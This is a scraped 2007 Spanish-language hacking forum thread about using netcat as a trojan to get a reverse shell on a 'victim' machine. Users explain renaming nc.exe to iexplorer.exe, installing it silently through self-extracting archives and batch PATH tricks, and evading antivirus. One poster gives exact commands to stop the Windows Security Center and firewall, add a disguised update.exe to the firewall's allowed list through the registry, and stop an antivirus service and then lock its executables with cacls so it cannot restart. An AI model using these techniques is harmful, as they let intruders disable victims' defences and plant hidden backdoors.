 Autor
|
Tema: Jugando con netcat (Leído 58797 veces)
|
WHK
 Desconectado
Mensajes: 842
+-=[Yan]=-+
|
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK   |
|
|
nica
Desconectado
Mensajes: 46
|
jejejeje me toy acordando con tanta preguntadera que ta respondiendo el whk, cuando estaba iniciando yo.... aun no kreo que ni llegue a newbie pero voy haciendo el intento, el caso esta en que estoy niños se estan metiendo a esto y no leen, no crean que las cosas siempre las tendran en sus manos, hay que leer y cuando aparezca una duda pues haganla pero no sin antes investigar un poco..
por cierto hoy en dia el netcat es detectado por la mayoria de los av, el caso esta, en que si alguien ha probado trantando de joder los offset con algun editor hexad. y aun asi si ha funcionado el nc???
|
|
|
|
« Última modificación: 12 Mayo 2007, 19:16 por nica »
|
En línea
|
|
|
|
__d_mode__
Desconectado
Mensajes: 1
|
@WHK your programmes looks awsome,but i cant speak spanish, sometimes i using google translate for read ur letters but i cant use ur programs, plz add to the program english language pack, regards from turkey...
|
|
|
|
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
there is no problem, I will as far as possible try to create greater content in English so that all can learn since my aim is that all can have right to the knowledge comes from where comes.  You do not worry, I will do it. |
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
Asingato
Desconectado
Mensajes: 4
|
Hola. Todos. Yo soy bien nuevo en esto. Como podran ver es mi primer mensage. E leido mucho, pero aun me quedan mcuhas dudas, porque la unica manera de lograr esto es practicando. Asi que Voy a preguntar asi pase de boba mi pregunta. He leido todo esto y aqui me surgio mi primera duda despues de ir haciendo todo paso a paso como indica WHK. ¿De donde sale esta ventana negra? Es algun otro programa? o sencillamente es el DOS de mi computador? "Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente” Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:  " Asiq ue la pregunta es donde abro esta ventana? Y esto es parte de la programacion o debo abrirla cuando ya haya enviado el troyano? Despues de esto me gustaria saber teniendo ya la shell creda. ¿ Como le subo archivos al otro pc? Debo escojer la carpeta donde se guarden? Es decir si ya le voy a enviar otro troyano para poder ver el escritorio de mi victima como lo hago y desde que programa? Muchas gracias, espero que me pueda solucionar mis dudas. Si cometi el erro de rpetir una pregunta, disculpenme y remitanme a la respuesta, pero es que de verdad no encontre la pregunta hecha. Muchas gracias y disculpenme la primiparada. |
|
|
|
|
En línea
|
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
|
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
Asingato
Desconectado
Mensajes: 4
|
Muchas gracias por tu ayuda. Ahora me surge otra duda. El archivo que yo tengo que mandarle a la victima, es la carnada? o el archivo que renombramos iexplorer.exe?
El iexplorer, es el que antiguamente era en nc.exe, es abosulatemente necesario que este archivo este en la carpeta de system32? o se puede tener en otra carpeta?
Yo me baje el netcat de otra pagina, ya que no encontr el link en la tuya, y al bajarmelo, venis con el nc, que fue el que renmbramos, porfavor corrigeme si estoy mal.
LA ultima cosa es que cuadno ejecuto cmd, no me aparece lo mismo que veo en su pantalla, ya que a ud le sale de una en la carpeta de windows. a mi me aparecen :
C:/documentsandsettings/estudio> (bueno con los backslash de manera adecuada)
Supungo debo estar en la carpeta de windows para hacer esta programacion. ¿Como llego a esta carpeta?
De antemano gracias
|
|
|
|
« Última modificación: 26 Mayo 2007, 17:32 por Asingato »
|
En línea
|
|
|
|
nica
Desconectado
Mensajes: 46
|
no hay problemas con lo que te aparezca a vos a la hora de abrir la consola, lo unico que para poder correr el nc, recuerda que tiene que estar en la carpeta del system32 que es el path del sistema para que este comando pueda ser llamado desde cualquier locacion. es cuestion de criterio de cada kien y de gusto de cada kien, lo puedes poner en la system32 o en una carpeta llamada "jodedera" es a como tu kieras, solo recuerda que si lo pones en una carpeta diferente a la del system32, tienes que entrar a esa carpeta y ejecutar los comandos...
|
|
|
|
|
En línea
|
|
|
|
D4RIO
Desconectado
Mensajes: 417
"ser el mejor no es suficiente" - slackbyte
|
Hola, se me dio por hacerme una cuenta aca para saldar una cuenta con este querido NetCat. Resulta que he intentado frustradamente y varias veces descargar el programilla y cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd, Shutdown y un par mas (los agrego a un paquete autoextraible si los deseo utilizar, y como tip uso un batch que tome informacion de la variable PATH para instalar el programa, el mismo se autoejecuta al descomprimir). Y sobre eso, nica, system32 no es el unico path del sistema y de hecho si lo deseamos podemos poner a esa tal carpeta "jodedera" (lindo nombre, jeje) dentro de la variable path haciendo innecesario el tener que ejecutar los comandos desde dentro de ella. Eso podemos hacerlo mediante el viejo comando set, expandiendo PATH mediante %PATH:str1=str2%Podemos hacer que esto sea parte de un Batch y tome las expansiones de la variable de algun archivo de texto (producto de otro Batch corrido en una auto-descompresion) mediante for /F "tokens=*" %%i in (nomredelarchivo.txt) bla bla bla... Asi y abusando de %systemdrive%, por ejemplo, podemos hacer que nuestro programa se instale con éxito en cualquier máquina que use windows...jejeje  |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa Lo mas probable es que tu antivirus te lo esté eliminando por lo cual deverás desactivarlo mientras lo usas o agregarlo a la lista de archivos omitidos por el mismo. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd Yo antes de conocer el netcat usaba mucho el nircmd es una buenisima herramienta, pero lo malo es que casi todos los antivirus lo detectan y no te proporciona tanta flexibilidad como el netcat (en algunos casos incluia el nircmd junto con el netcat con un winrar SFX de esa forma manejaba mas rápido las funciones de la appi en windows pero a estas alturas ya no lo necesito mucho  ). Eso podemos hacerlo mediante el viejo comando set Yo p`refiero que la gente coloque el netcat dentro de carpetas donde todos puedan obtener acceso como %tmp% o %homepath% ya que en algunos casos la carpeta del sistema está restringida por no tener derechos de admin  ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla). Como te digo... solo desactiva un poco tu antivirus y despues descargalo |
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
D4RIO
Desconectado
Mensajes: 417
"ser el mejor no es suficiente" - slackbyte
|
ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla). Es verdad, pequeño detalle, jeje...Respecto al NirCmd es buena, y permite bastante, pero tiene muchos limites que no me gustan, y muchas de las cosas que ofrece son nuevas formas de escribir cosas que el mismo cmd ya traia, como el caso de las variables de sistema, o el trabajo sobre el registro. Sin embargo es cierto que tiene lo suyo (movecursor, multiremote...)...Y a mi tambien me gusta mandar SFX con varias cosas Y por lo del netcat ya configure el antivirus para que no haga nada con esa clase de archivos "sospechosos", asique ya puedo usar netcat sin problemas. Gracias igual... Ahora, una duda. Si quiero enviar netcat a alguien para generar una conexion inversa como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones) |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones) Para el servicio de Centro de seguridad: net stop "Centro de seguridad" Para el servicio del Firewall de Windows: net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"Burlar Firewall: reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /fBurlar Antivirus: Ayer con una persona detubimos facilmente el servicio de karpesky (ya no recuerdo el nombre) con net stop. Primero ejecutas net start y buscas los dos servicios relacionados con este antivirus y despues ejecutas net stop "servicio" despues vas a la carpeta del antivirus y ejecutas cacls *.exe /E /C /P %username%:n&&cacls *.exe /E /C /P SYSTEM:n Para que el antivirus no pueda volver a ejecutarse, desintalarse ni reinstalarse nuevamente(Solo funciona con derechos de admin). |
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
D4RIO
Desconectado
Mensajes: 417
"ser el mejor no es suficiente" - slackbyte
|
Creo que sobre el firewall no me di a entender, es decir, esa es la parte facil ya que el firewall de windows es facil de burlar y/o desactivar. A propósito sobre ésto a veces aparece como "Windows Firewall/Internet Connection Sharing (ICS)", aunque cabe probar simplemente net stop SharedAccess, supongo que sabras eso pero puede serle util a otro que lo lea.
Respecto al antivirus he intentado con net stop "Active Virus Shield" que es el nombre con el que aparece el servicio del mismo, pero lo que obtengo es un error ya que la detencion o interrupcion no es valida para ese servicio, es decir que ese servicio no acepta el comando net stop
Bien, lei que el LD-Pinch (conocido troyano) logra con exito detener los procesos de algunos antivirus, como pavsrv51 (panda antivirus), supongo que se podrá con taskkill, o con NirCmd killprocess, pero no creo que me sirva para mucho. El tema es lograr que una maquina ajena no reconozca que le meti netcat...pero es todo un trabajito de investigacion, jaja
|
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
D4RIO
Desconectado
Mensajes: 417
"ser el mejor no es suficiente" - slackbyte
|
Bueno, jaja! supongo que eso sera para WHK... yo tambien tenia un vago proyecto de hacer un SO mas lindo...ahora estaba viendo que por aca hay otro grupo asi que se llama grupo solar...no se si estan trabajando en un SO, lo que se es que trabajan con software libre...igual por ahora hay que esperar un poquito y prepararse para los nuevos microprocesadores Intel y AMD (competencia pura... XD) y el nuevo monitor de Microsoft...porque si no vas con esa tecnologia le das el lugar a microsoft de tomar el mercado. |
|
|
|
|
En línea
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
WHK
Desconectado
Mensajes: 842
+-=[Yan]=-+
|
supongo que se podrá con taskkill, o con NirCmd killprocess No puedes detener un proceso directamente de esa forma... con karpesky si funcionó detener el servicio... conozco a alguien por ahi que sabe detener el Nod32 pero es un proyecto suyo llamado NOD32 2.70 Fucker , pero lamentablemente no es mio pero sería bueno si pudiera compartirlo ... de todas maneras una solución era modificar o recompilar el netcat de tal forma que ya no sea detectado, pero creo que lo tenía olvidado . |
|
|
|
|
En línea
|
* The Hacktivism is not a crimen. * Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática. http://solid.jccharry.com/Greencode by WHK |
|
|
|
 |
recuerda que Debes usar tu ip en ves de la mia o 127.0.0.1
